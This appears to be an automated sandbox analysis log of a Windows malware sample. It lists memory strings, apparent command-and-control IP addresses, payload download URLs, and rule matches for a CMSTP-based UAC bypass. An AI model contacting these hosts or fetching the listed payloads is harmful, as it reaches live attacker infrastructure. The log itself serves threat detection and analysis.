                  Source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.symauth.com/cps09
                  Source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.symauth.com/rpa04
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2509465588.000000000338A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2509465588.000000000338A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
                  Source: explorer.exe, 00000012.00000002.3675598739.000000000335F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2504610783.000000000335C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valicert.com/1
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
                  Source: explorer.exe, 00000012.00000002.3675598739.000000000335F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x.ss2.us/x.cerZr
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
                  Source: Server.exe | String found in binary or memory: http://xml.org/sax/features/external-general-entities
                  Source: Server.exe | String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
                  Source: Server.exe | String found in binary or memory: http://xml.org/sax/properties/lexical-handler
                  Source: Server.exe, 0000000C.00000002.2383984278.0000000000B7E000.00000002.00000001.01000000.0000000B.sdmp, Server.exe, 0000000F.00000002.2450483452.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://xml.org/sax/properties/lexical-handlerhttp://xml.org/sax/features/external-parameter-entities
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C8000.00000004.00001000.00020000.00000000.sdmp, K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034CE000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://147.45.196.157:443
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C6000.00000004.00001000.00020000.00000000.sdmp, K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C8000.00000004.00001000.00020000.00000000.sdmp, K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034CE000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://193.187.172.163:443
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://193.187.172.163:443$
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C6000.00000004.00001000.00020000.00000000.sdmp, K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://193.187.172.163:443https://46.8.232.106:443
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034A2000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://46.8.232.106:443
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C8000.00000004.00001000.00020000.00000000.sdmp, K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034CE000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://91.212.166.91:443
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C8000.00000004.00001000.00020000.00000000.sdmp, K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034CE000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://91.212.166.9:443
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
                  Source: Set-up.exe, 00000001.00000003.1870853360.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                  Source: Set-up.exe, 00000001.00000003.1870853360.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: Set-up.exe, 00000001.00000003.1870853360.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                  Source: Set-up.exe, 00000001.00000003.1870853360.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
                  Source: more.com, 0000000D.00000002.2471707337.0000000005770000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3670818846.00000000004A1000.00000002.00000001.01000000.00000000.sdmp | String found in binary or memory: https://data-seed-prebsc-1-s1.binance.org:8545/RtlDosPathNameToRelativeNtPathName_U_WithStatushttp:
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
                  Source: Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: explorer.exe, 00000012.00000002.3693450265.0000000026707000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
                  Source: Set-up.exe, 00000001.00000003.1923432107.0000000003D6C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://peacefzulpillow.today/
                  Source: Set-up.exe, 00000001.00000003.2018409901.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2018169072.0000000003D75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://peacefzulpillow.today/9
                  Source: Set-up.exe, 00000001.00000003.2018409901.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2018169072.0000000003D75000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1951297788.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1952968501.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1923432107.0000000003D6C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://peacefzulpillow.today/C
                  Source: Set-up.exe, 00000001.00000003.1872080300.0000000003D75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://peacefzulpillow.today/Kdzw
                  Source: Set-up.exe, 00000001.00000003.1837200470.0000000003D75000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1839066654.0000000003D75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://peacefzulpillow.today/Kdzw4m#
                  Source: Set-up.exe, 00000001.00000003.1951297788.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1952968501.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1923432107.0000000003D6C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://peacefzulpillow.today/Kdzwe
                  Source: Set-up.exe, 00000001.00000003.1899319162.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1951297788.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1952968501.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1923432107.0000000003D6C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://peacefzulpillow.today/Kdzwefm
                  Source: Set-up.exe, 00000001.00000003.1899319162.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://peacefzulpillow.today/Kdzwejma
                  Source: Set-up.exe, 00000001.00000003.1809850617.0000000003D74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://peacefzulpillow.today/c
                  Source: Set-up.exe, 00000001.00000003.1870812910.0000000003D74000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870963563.0000000003D74000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1871348179.0000000003D75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://peacefzulpillow.today/h
                  Source: Set-up.exe, 00000001.00000003.2018409901.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2018169072.0000000003D75000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1951297788.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1952968501.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1923432107.0000000003D6C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://peacefzulpillow.today/z
                  Source: Set-up.exe, 00000001.00000003.2018283458.0000000003D4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2018514152.0000000003D57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://peacefzulpillow.today:443/Kdzw
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://repository.luxtrust.lu0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://repository.tsp.zetes.com0
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://web.certicamara.com/marco-legal0Z
                  Source: Set-up.exe, 00000001.00000003.1870853360.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.anf.es/address/)1(0&
                  Source: explorer.exe, 00000012.00000003.2508603714.00000000267B0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.catcert.net/verarrel
                  Source: explorer.exe, 00000012.00000003.2508603714.00000000267B0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.catcert.net/verarrel05
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
                  Source: Set-up.exe, 00000001.00000003.1870853360.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: Set-up.exe, 00000001.00000003.2110639894.0000000003D58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mediafire.com/file_premium/tgt65hk2h8vsbrn/skeletal.bin/file
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.netlock.hu/docs/
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.netlock.net/docs
                  Source: Set-up.exe, 00000001.00000003.2018092532.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2102473180.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.suarakutim.com/temp/DialogL.exe
                  Source: Set-up.exe, 00000001.00000003.2018092532.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2102473180.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.suarakutim.com/temp/DialogL.exe2
                  Source: Set-up.exe, 00000001.00000003.2102508777.00000000015A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.suarakutim.com/temp/DialogL.exe3
                  Source: Set-up.exe, 00000001.00000003.2018092532.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.suarakutim.com/temp/DialogL.exer
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49721 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49723 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49724 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49725 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49726 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49727 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49728 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 191.101.230.18:443 -> 192.168.2.4:49729 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.17.151.117:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.18.36.145:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416

                  System Summary

                  Source: 18.2.explorer.exe.50a9b57.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 18.2.explorer.exe.50aa757.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 15.2.Server.exe.b278901.23.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.Server.exe.b3c7901.24.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 13.2.more.com.483db57.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 23.2.Server.exe.b4195ce.20.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 16.2.more.com.4465a8a.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 23.2.Server.exe.b3d3901.23.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.Server.exe.b40c9ce.22.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 15.2.Server.exe.b2bd9ce.21.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 16.2.more.com.44ab757.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 13.2.more.com.47f8a8a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.Server.exe.b40d5ce.23.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 23.2.Server.exe.b4189ce.21.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 15.2.Server.exe.b2be5ce.24.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 18.2.explorer.exe.5064a8a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 13.2.more.com.483e757.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 16.2.more.com.44aab57.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_009CE540: GetFileAttributesW,CreateFileW,DeviceIoControl,CloseHandle,wcsncmp,?assign@?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@PBG@Z,GetLastError,CloseHandle,15_2_009CE540
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_0047B280
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_0047B5F0
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_0043F800
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_004319E0
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_0047B9A0
